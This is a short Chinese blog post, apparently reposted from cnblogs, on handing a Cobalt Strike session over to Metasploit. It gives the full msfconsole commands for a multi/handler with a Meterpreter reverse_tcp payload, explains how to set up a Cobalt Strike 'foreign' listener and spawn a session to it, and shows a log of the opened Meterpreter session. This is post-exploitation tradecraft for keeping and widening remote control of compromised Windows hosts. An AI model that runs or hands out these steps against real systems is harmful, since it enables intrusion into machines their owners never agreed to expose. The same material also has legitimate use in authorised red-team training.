码迷,mamicode.com
首页 > Web开发 > 详细

cobaltstrike派生一个shell给metasploit

时间:2020-03-06 11:14:11      阅读:110      评论:0      收藏:0      [点我收藏+]

标签:inf   com   bsp   图片   payload   started   ever   listen   foreign   

1、msf创建监听

msf5 > use exploit/multi/handler 
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 0.0.0.0
lhost => 0.0.0.0
msf5 exploit(multi/handler) > set lport 4434
lport => 4434
msf5 exploit(multi/handler) > set exitonsession false 
exitonsession => false
msf5 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

2、cs创建listeners(类型必须是foreign类型,地址必须是msf的地址,端口是msf监听的端口)

技术图片

 3、在cs现有session上派生会话

技术图片

 

 技术图片

 4、msf上出现session

msf5 exploit(multi/handler) > 
[*] Started reverse TCP handler on 0.0.0.0:4434 
[*] Sending stage (206403 bytes) to 192.168.3.21
[*] Meterpreter session 1 opened (192.168.0.13:4434 -> 192.168.3.21:61786) at 2020-03-06 10:01:16 +0800

 

cobaltstrike派生一个shell给metasploit

标签:inf   com   bsp   图片   payload   started   ever   listen   foreign   

原文地址:https://www.cnblogs.com/yyxianren/p/12425062.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!